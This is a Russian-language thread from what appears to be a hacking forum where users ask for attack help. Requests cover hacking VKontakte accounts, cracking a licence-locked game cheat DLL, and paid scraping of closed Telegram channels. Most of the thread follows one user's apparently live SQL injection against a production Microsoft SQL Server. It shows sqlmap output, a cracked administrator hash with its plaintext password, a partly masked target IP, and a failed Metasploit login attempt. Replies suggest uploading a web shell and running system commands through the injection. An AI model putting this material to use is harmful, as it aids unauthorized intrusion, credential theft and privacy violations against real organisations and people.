красава
-
XSS.stack #1 – первый литературный журнал от юзеров форума
[web-hacking] Ваши вопросы
- Автор темы .Slip
- Дата начала
-
- Теги
- web-hacking
Взлом вконтакте. Как делать?
Спасибо,нормально. Как сам?
У меня есть длл чита и я хочу его крякнуть.
DLL - https://mega.nz/#!JPJ11IoL
KEY - tkMCL0jR4Mb607HN8ToW013CXSqL26NmFUievL21Mh4
Пожалуйста, кто нибудь крякните.
Я пытался дампануть но не получилось, он привязывается HWID вроде.
Name of cheat - HPP HACK
GAME- CS 1.6
DLL - https://mega.nz/#!JPJ11IoL
KEY - tkMCL0jR4Mb607HN8ToW013CXSqL26NmFUievL21Mh4
Пожалуйста, кто нибудь крякните.
Я пытался дампануть но не получилось, он привязывается HWID вроде.
Name of cheat - HPP HACK
GAME- CS 1.6
Подскажите в чем проблема дамплю колонки выводит,не пойму в чем проблема пустые колонки?
[INFO] fetching entries of column(s) 'U_SBO_PASS, U_SBO_USER' for table '@UB_ADM' in database 'PW_PROD'
[14:58:41] [WARNING] in case of table dumping problems (e.g. column entry order) you are advised to rerun with '--force-pivoting'
[14:58:41] [INFO] resumed: ''
[14:58:41] [INFO] resumed: ''
[14:58:41] [INFO] resumed: ''
[14:58:41] [INFO] fetching number of column(s) 'U_SBO_PASS, U_SBO_USER' entries for table '@UB_ADM' in database 'PW_PROD'
[14:58:41] [INFO] retrieved:
[14:58:41] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[14:58:41] [WARNING] time-based comparison requires larger statistical model, please wait.......................... (done)
[14:58:46] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[14:58:46] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[14:58:46] [WARNING] unable to retrieve the number of column(s) 'U_SBO_PASS, U_SBO_USER' entries for table '@UB_ADM' in database 'W_PROD'
[14:58:46] [INFO] fetched data logged to text files under
Система
web server operating system: Windows 10 or 2016
web application technology: ASP.NET, Microsoft IIS 10.0, ASP
back-end DBMS: Microsoft SQL Server 2012
current user: 'sa'
current database: 'PW_PROD'
current user is DBA: True
[INFO] fetching entries of column(s) 'U_SBO_PASS, U_SBO_USER' for table '@UB_ADM' in database 'PW_PROD'
[14:58:41] [WARNING] in case of table dumping problems (e.g. column entry order) you are advised to rerun with '--force-pivoting'
[14:58:41] [INFO] resumed: ''
[14:58:41] [INFO] resumed: ''
[14:58:41] [INFO] resumed: ''
[14:58:41] [INFO] fetching number of column(s) 'U_SBO_PASS, U_SBO_USER' entries for table '@UB_ADM' in database 'PW_PROD'
[14:58:41] [INFO] retrieved:
[14:58:41] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[14:58:41] [WARNING] time-based comparison requires larger statistical model, please wait.......................... (done)
[14:58:46] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[14:58:46] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[14:58:46] [WARNING] unable to retrieve the number of column(s) 'U_SBO_PASS, U_SBO_USER' entries for table '@UB_ADM' in database 'W_PROD'
[14:58:46] [INFO] fetched data logged to text files under
Система
web server operating system: Windows 10 or 2016
web application technology: ASP.NET, Microsoft IIS 10.0, ASP
back-end DBMS: Microsoft SQL Server 2012
current user: 'sa'
current database: 'PW_PROD'
current user is DBA: True
Эмми. Ты можешь шёл залить. Или рдп сделать. Для ответа мало инфы
для шелла путь нужно искать не получается,мало инфы какую нужно инфу
ручками пробовал крутить? попробуй уменьшить количество потоков.
нет руками не пробовал, количество уменьшал ставил timeout
Ты можешь системные команды выполнить. Есть основания так считать..
Информация о запросах и ответах
не совсем понял запустить с параметром -vv и скинуть сюда ответы о запросах?
как залить шелл
current user: 'sa'
current database: 'PW_PROD'
current user is DBA: True
сломал хеш админа [*] sa (administrator) 0x02009dc7d4300e144920205a7ccd433febb2baaf759b1611be63aa86bed7c983368fc3a34e661da59b0830f988fab6ae765c8a0676977b7c107edc6d56a2a177684d80433512:Bos555555
просканил ip
Host script results:
| ms-sql-info:
| 52.**.***.***:1433:
| Version:
| name: Microsoft SQL Server 2016 SP1+
| number: 13.00.4422.00
| Product: Microsoft SQL Server 2016
| Service pack level: SP1
| Post-SP patches applied: true
|_ TCP port: 1433
Пытаюсь через метасплоит auxiliary/scanner/mssql/mssql_login
[*] 52.**.***.*** - 52.**.***.***:1433 - MSSQL - Starting authentication scanner.
[!] 52.**.***.*** - No active DB -- Credential data will not be saved!
[-] 52.**.***.***:1433 - 52.**.***.***:1433 - LOGIN FAILED: WORKSTATION\sa:Bos555555 (Incorrect: )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
я так понимаю неверный пароль выдает?
current user: 'sa'
current database: 'PW_PROD'
current user is DBA: True
сломал хеш админа [*] sa (administrator) 0x02009dc7d4300e144920205a7ccd433febb2baaf759b1611be63aa86bed7c983368fc3a34e661da59b0830f988fab6ae765c8a0676977b7c107edc6d56a2a177684d80433512:Bos555555
просканил ip
Host script results:
| ms-sql-info:
| 52.**.***.***:1433:
| Version:
| name: Microsoft SQL Server 2016 SP1+
| number: 13.00.4422.00
| Product: Microsoft SQL Server 2016
| Service pack level: SP1
| Post-SP patches applied: true
|_ TCP port: 1433
Пытаюсь через метасплоит auxiliary/scanner/mssql/mssql_login
[*] 52.**.***.*** - 52.**.***.***:1433 - MSSQL - Starting authentication scanner.
[!] 52.**.***.*** - No active DB -- Credential data will not be saved!
[-] 52.**.***.***:1433 - 52.**.***.***:1433 - LOGIN FAILED: WORKSTATION\sa:Bos555555 (Incorrect: )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
я так понимаю неверный пароль выдает?
это хэш чего? например в mysql есть одноименная бд и в ней таблица user в которой хранятся логины и пароли для доступа к бд, как в микрасофте хз, погугли, думаю найдешь инфу
второе - на микрасофтовских бд нередко почему-то попадается возможность выполнения системных команд, пробуй через неё залить шел если есть через скуля
третье - если логин не подходит и работаешь через скулю смотри привилегии текущего юзверя, чтение и запись
если опять таки через скулю то это может быть хэш от админки через неё
там прямо написано что вход неканает
А вообще чтобы получить дельный совет нужно правильно описывать ситуациию, а не выкинуть вывод тулзы
так я вроде и описываю ситуацию Система
banner:
---
Microsoft SQL Server 2014 (SP2-GDR) (KB4019093) - 12.0.5207.0 (X64)
Jul 3 2017 02:25:44
Copyright (c) Microsoft Corporation
Standard Edition (64-bit) on Windows NT 6.3 <X64> (Build 9600: ) (Hypervisor)
На mysql знаю команда --users --passwords --privileges выводит юзеров,пароль и привилегии в mssql вывел юзеров и пароли такой командой
select name,master.sys.fn_sqlvarbasetostr(password_hash) from master.sys.sql_logins
--is-dba пишет True
команда --privileges выводит просто всех юзеров
database management system users privileges:
[*] ##MS_AgentSigningCertificate##
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicySigningCertificate##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] ##MS_SmoExtendedSigningCertificate##
[*] ##MS_SQLAuthenticatorCertificate##
[*] ##MS_SQLReplicationSigningCertificate##
[*] ##MS_SQLResourceSigningCertificate##
[*] bwuser
[*] sa (administrator)
как посмотреть какие конкретные привилегии есть не знаю
делал по этой статье
Код:
https://harryadinanta.com/exploitasi/2015/06/24/Using-sqlmap-to-exploit-sql-injection-running-on-top-of-ASP-NET-and-MSSQL-2012
Последнее редактирование:
описать ситуацию - не только вывести ситему, а написать каким образом ты добыл хэш, может сам придумал, может конфиг какой-то прочитал
я так понимаю ты юзал склмап - мой совет, прочитай повнимательнее мануал по использованию sqlmap и изучи хотя бы основы узвимости недостаточной фильтрации входных параметров и эксплуатацию её через внедрение произвольного sql кода и её эксплуатацию для разных субд прежде чем что-то там заливать
мы друг друга или не понимаем или ты читаешь только первые строчки я расписал с нуля как дошел до хеша и все запросы которые делал я с mssql не часто встречался поэтому и написал может кто знает как с ней работать
На самом деле сложно так помогать, наверное единственное верное будет, это советовать читать маны...
хдг12 почти всё верно написал.
хдг12 почти всё верно написал.
Смотри друг, вопрос стоял о том как залить шелл, но у тебя даже к бд подключиться не может...
если не можешь посмотреть привилегии - пробуй опытным путем, читать файлы, записать и прочесть файл, через мап выполнить команды, вручную выполнить команды, записать что-то в бд
mssql мне попадалась не часто, но для подключения к бд пароли вроде хранятся в sys.server_principals
возможно ты в метасплоит что-то неправильно записал, попробуй создать пхп скрипт для подключения и пробуй
если нет возможно там ограничения стоят на подключения с определенных ip много чего может быть
пробуй и как написали выше читай маны
Привет, как думаете это очень мифически будет выглядить, если искать способ парса контаков из закрытых каналов t.me ?
P.s если возможно готов оплатить хорошо!
P.s если возможно готов оплатить хорошо!